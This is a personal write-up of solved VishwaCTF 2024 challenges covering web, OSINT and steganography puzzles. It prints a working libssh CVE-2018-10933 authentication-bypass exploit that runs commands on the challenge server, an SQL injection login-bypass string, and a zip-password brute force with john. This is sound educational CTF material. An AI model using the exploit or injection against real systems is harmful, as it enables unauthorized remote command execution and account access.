CTF WriteUp: VishwaCTF 2024

Durgesh

2024-03-04

After long time, over this weekend i participated in a CTF - VishwaCTF-2024, it was beginner freindly CTF where i solved some challenges over there, Below is the writeup for the challenges that I managed to solve.

All challenges can be found here

Web

Save The City

Description

The RAW Has Got An Input That ISIS Has Planted a Bomb Somewhere In The Pune! Fortunetly, RAW Has Infiltratrated The Internet Activity of One Suspect And They Found This Link. You Have To Find The Location ASAP!

after opening the site i stumbled upon blank page where was nothing but just “libssh_0.8.1” so i googled exploit for this particular version where i got to know that it is vulnerable to Authentication Bypass (CVE-2018-10933) vuln and got this page where

Exploit

import sys
import paramiko
import socket

s = socket.socket()
s.connect(("13.234.11.113",31133))
m = paramiko.message.Message()
t = paramiko.transport.Transport(s)
t.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
t._send_message(m)
c = t.open_session(timeout=5)
c.exec_command(sys.argv[1])
out = c.makefile("rb",2048)
output = out.read()
out.close()
print (output)

after ls’ing the dir we got the flag

1	python solve.py "cat secret.txt/flag.txt"

Trip To Us

Description

IIT kharakpur is organizing a US Industrial Visit. The cost of the registration is $1000. But as always there is an opportunity for intelligent minds. Find the hidden login and Get the flag to get yourself a free US trip ticket.

it was typical SQLi bypass challenge, using admin” or “1”=”1”– as username and password i did able to bypass it.

They Are Coming

Description

Aesthetic Looking army of 128 Robots with AGI Capabilities are coming to destroy our locality!

Nothing interesting on home page at first glance, looking at source code got a js file where some bottom portion of code caught my attention after beautifying it

yt = () => {
       localStorage.setItem("userRole", "admin"), localStorage.setItem("F1ag", "Open Your Eyes!"), localStorage.setItem("lastLogin", "2023-01-01T12:00:00Z"), localStorage.setItem("theme", "dark"), localStorage.setItem("language", "en_US"), localStorage.setItem("isLoggedIn", "true"), localStorage.setItem("unreadMessages", "5"), localStorage.setItem("preferredCurrency", "USD");
       return localStorage.setItem("DivID", "205"), localStorage.setItem("Flag", "Gkul0oJKhNZ1E8nxwnMY8Ljn1KNEW9G9l+w243EQt0M4si+fhPQdxoaKkHVTGjmA"), localStorage.setItem("AppVer", "1.0"), (0, vt.jsx)(vt.Fragment, {
           children: (0, vt.jsxs)("div", {
               className: "hint-main",
               children: [(0, vt.jsx)("h1", {
                   className: "hint",
                   children: "A Courrpt AI Agent and Its Army of 128 Aesthetic Looking Robots Are Heading Towards Local Vault of the City of Dawn!"
               }), (0, vt.jsx)("p", {
                   className: "hint1",
                   style: {
                       display: "none"
                   },
                   children: "I have done 128 cbc tests"
               })]
           })
       })
   },
   bt = {
       hh188: "/",
       getKey: "/secret-location"
   };

so as we can see here some data being stored on local storage and moreover more interesting one is Flag item that has some encrypted value

hmm, so most probably this one is a real flag that is encrypted using key? , if so which encryption standard and key?.

so about encryption algorithm we got some hints already, if you look on above code there is children key with value I have done 128 cbc tests so its most likely AES 128 CBC

and about key? so if we check robots.txt we all sorted out

User-agent: *
Disallow: /admin
L3NlY3JldC1sb2NhdGlvbg==
Decryption key: th1s_1s_n0t_t5e_f1a9

now we have Decryption key and cipher as well we are ready to go to this site and we got the flag.

OSINT

The end is beginning

Description

searching for

1
2
3

I’d be gone to my dad  
And ask for some cash  
I ran ......

shows me a rap song results, maybe its connected to lyrics of this particular song, so going through lyrics i figured out second portion of flag that is

and the first part was name of song i.e. Pradox so th flag will be

VishwaCTF{Paradox_5000}

TRY HACK ME

Discription

as description says one of the team member, i went straight through their official page where they have page for thier team members in the bottom

after checking each member profile with their username one of them have same ranking as mentioned and flag mentioned in description as well.

ifconfig_inet

Description

hmm, sound familiar though. okay reading all description i searched for this

as we can see we got some reddit pages that is about some IP address( BTW this challenge is ragarding a famous television series Mr. Robot so if you have watched it, it may give you some insights)

i got this image

so maybe the highlighted one is what we searching for but still left with the .dat file that is first half our flag, searching more gives me this page

and here some people were talking about IP addresses, reading their chat i got the file name i.e. fsociety00.dat

so flag is

VishwaCTF{fsociety00.dat_218.108.149.373}

Post CTF

Steg

We Are Valorant

Description

we have given two file i.e. we_are_valorant.adts and Astra_!!.mp4, after checking the format of .adts using file command it shows its jpg one

after changing its magic numbers to jpg it turns out as valorant theme jpg file, i tried getting some info from this file but no use and also uploaded it to the Aperi site but got nothing.

but when i changed the extension of original one i.e. we_are_valorant.adts to .jpg and uploaded it there then there were some Comman Passwords i.g. Tenz, tenz, From the shadows, Dissipate, dissipate, Kyedae, kyedae

using steghide with first password that is Tenz extracts a file not_a_secret.txt that contains the flag.

VishwaCTF{you_are_invited_to_the_biggest_valorant_event}

Mysterious Old Case

Description

You as a FBI Agent, are working on a old case involving a ransom of $200,000. After some digging you recovered an audio recording.

here we given final.mp3 and upon checking its exif we got this

ExifTool Version Number         : 12.65
File Name                       : final.mp3
Directory                       : .
File Size                       : 2.6 MB
File Modification Date/Time     : 2024:03:01 23:06:29-05:00
File Access Date/Time           : 2024:03:03 22:21:21-05:00
File Inode Change Date/Time     : 2024:03:01 23:08:07-05:00
File Permissions                : -rw-r--r--
File Type                       : MP3
File Type Extension             : mp3
MIME Type                       : audio/mpeg
MPEG Audio Version              : 1
Audio Layer                     : 3
Audio Bitrate                   : 128 kbps
Sample Rate                     : 44100
Channel Mode                    : Stereo
MS Stereo                       : Off
Intensity Stereo                : Off
Copyright Flag                  : False
Original Media                  : False
Emphasis                        : None
ID3 Size                        : 320209
Title                           : Unknown
Artist                          : Anonymous
Track                           : 727/305
Album                           : Cooper
Recording Time                  : 1971
Genre                           : the zip file is 100 MB not 7 GB
Original Release Time           : 0001
Band                            : DB Cooper
Comment                         : password for the zip is all lowecase with no spaces
User Defined URL                : https://drive.google.com/file/d/1bkuZRLKOGWB7tLNBseWL34BoyI379QbF/view?usp=drive_lin
User Defined Text               : (purl) https://drive.google.com/file/d/1bkuZRLKOGWB7tLNBseWL34BoyI379QbF/view?usp=drive_lin
Picture MIME Type               : image/jpeg
Picture Type                    : Front Cover
Picture Description             : Front Cover
Picture                         : (Binary data 158421 bytes, use -b option to extract)
Date/Time Original              : 1971
Duration                        : 0:02:22 (approx)

here are some exif infos that caught my attention i.e. Genre, Band, Comment and User Defined URL, in URL we have given drive file link that is log zip file named flight_logs.zip that is encrypted.

and comments says password for the zip is all lowecase with no spaces but we don’t even have password till now

and if you see Band it has value DB Cooper i searched it on google and got to know that its a person name who hijacked Northwest Orient Airlines Flight 305, a Boeing 727 aircraft, in United States airspace on November 24, 1971.

and because our file name is flight_log.zip its connecting our insights that we are in right directions

i tried some passwords from exif info but no use but i had all info about DB Cooper in wikipedia the major one is the one that i mentioned above so then i tried name of the flight that is Northwest Orient Airlines Flight as passsword northwestorientairlines and it worked indeed.

now if we look inside folder we have thousand of log file and thats intimidating but there very simple logic of mine worked, that is i sorted out all the file on the basis of their size i.e.

└─$ ls -lSh | head
total 7.4G
-rwxr-xr-x 1 zr0x zr0x  14M Feb 26 12:25 Flight-305.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:09 Flight-2270.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:05 Flight-448. log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:11 Flight-4551.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:05 Flight-533. log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:10 Flight-5358.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:11 Flight-6294.log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:05 Flight-651. log
-rwxr-xr-x 1 zr0x zr0x 9.9M Feb 26 11:11 Flight-6867.log

so if you look at the list the first one is Flight-305.log and thats the desired one

and i contains around some 30,0000 lines if you scroll it gradually you’ll gonna see the part of flag, so either we can grab it one by one or filter it using regex and tr e.g.

1 2	└─$ grep -v '^1971-11-24.*727$' Flight-305.log \| tr '\n' ' ' \| tr -d ' ' VishwaCTF{1_W!LL_3E_B@CK}

BTW we could have find the targeted log file simply by the number of filght that is mentioned in wikipedia i.e. Flight 305

Secret Code

Description

Akshay has a letter for you and need your help

two files confidential.jpg and letter.txt

cating letter.txt says

To,
VishwaCTF'24 Participant

I am Akshay, an ex employee at a Tech firm. Over all the years, I have been trading Cypto currencies and made a lot of money doing that. Now I want to withdraw my money, but I'll be charged a huge tax for the transaction in my country.

I got to know that you are a nice person and also your country doesn't charge any tax so I need your help. 

I want you to withdraw the money and hand over to me. But I feel some hackers are spying on my internet activity, so I am sharing this file with you. Get the password and withdraw it before the hackers have the access to my account.

Your friend,
Akshay

no useful information here, then i started working on jpg file and if you see below using strings shows it contains some more files inside itself , you can extract it is using foremost and some time unzip works as well.

└─$ strings -10 confidential.jpg            
'9=82<.342
!22222222222222222222222222222222222222222222222222
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
5ecr3t_c0de.zip
5ecr3t_c0de.txt
:Ca&;hhyy*;
7<;P>wUr;3
:`Nw(HOR7A
utHV<=UC|Z
helper.txtM
5ecr3t_c0de.zip
helper.txt

so here helper.txt says

└─$ cat helper.txt 
Hey buddy, I'm really sorry if this takes long for you to get the password. But it's a matter of $10,000,000 so I can't risk it out.

"I really can't remember the password for zip. All I can remember is it was a 6 digit number. Hope you can figure it out easily"

now 5ecr3t_c0de.zip is protected and password possiblity is any 6 digit numbers within 999999 we can brute force it using john

script for generating all possible 6 digits numbers

def generate_combinations():
    with open("possible_combinations.txt", "w") as file:
        for i in range(1000000):
            combination = str(i).zfill(6) 
            file.write(combination + '\n')

if __name__ == "__main__":
    generate_combinations()

john command

┌──(zr0x㉿pwn3r)-[~/…/vishwaCTF-2024/steg/03_Secret_Code/tmp]
└─$ zip2john 5ecr3t_c0de.zip > secret.hash  

┌──(zr0x㉿pwn3r)-[~/…/vishwaCTF-2024/steg/03_Secret_Code/tmp]
└─$ john secret.hash --wordlist=../possible_combinations.txt

after unzipping we got two files i.e. 5ecr3t_c0de.txt and info.txt

info.txt

1	What are these random numbers? Is it related to the given image? Maybe you should find it out by yourself

5ecr3t_c0de.txt

└─$ cat 5ecr3t_c0de.txt|head
(443, 1096)
(444, 1096)
(445, 1096)
(3220, 1096)
(3221, 1096)
(38, 1097)
(39, 1097)
(43, 1097)
(80, 1097)
(81, 1097)
............
............

so if see info and 5ecr3t_c0de we can infer that given numbers are the coordinates likely indicate positions of pixels within the image.
they are probably in (x, y) order, representing horizontal (x) and vertical (y) coordinates. or height and width sequentially.

so anticipation is that we have given a blank black jpg images and these are flag coordinates which will create or show flag and most probably in white

we can use this script for that

from PIL import Image

def read_coordinates(file_path):
    with open(file_path, 'r') as f:
        coordinates = [tuple(map(int, line.strip('()\n').split(','))) for line in f]
    return coordinates

def draw_white_pixels(image_path, coordinates, output_path):
    img = Image.open(image_path)
    for coord in coordinates:
        img.putpixel(coord, (255, 255, 255))  # RGB value for white
    img.save(output_path)
    print(f"Done, check : {output_path}.")

image_path = '/confidential.jpg'
file_path = '/5ecr3t_c0de.txt'
output_path = 'output_image.png'

coordinates = read_coordinates(file_path)
draw_white_pixels(image_path, coordinates, output_path)

and here we go

OSINT

Sagar Sangram

with that sort tale description we have given descord server to join as well.

so if you are indian and know Indian mythological story then after reading this you’ll figure it aobut instantly that here its about The Samudra Manthana that is a major episode in Hinduism that is elaborated in the Vishnu Purana, a major text of Hinduism.

so when hop in the server we have given some instruction in rule section where we have to chat with a bot and answer some questions that is all regarding Samudra Manthana and if you manage to answer those all we will be given the flag at last.

Flag :

VishwaCTF{karmany-evadhikaras te ma phaleshu kadachana ma karma-phala-hetur bhur ma te sango stvakarmani}

Forensics

yet to do …………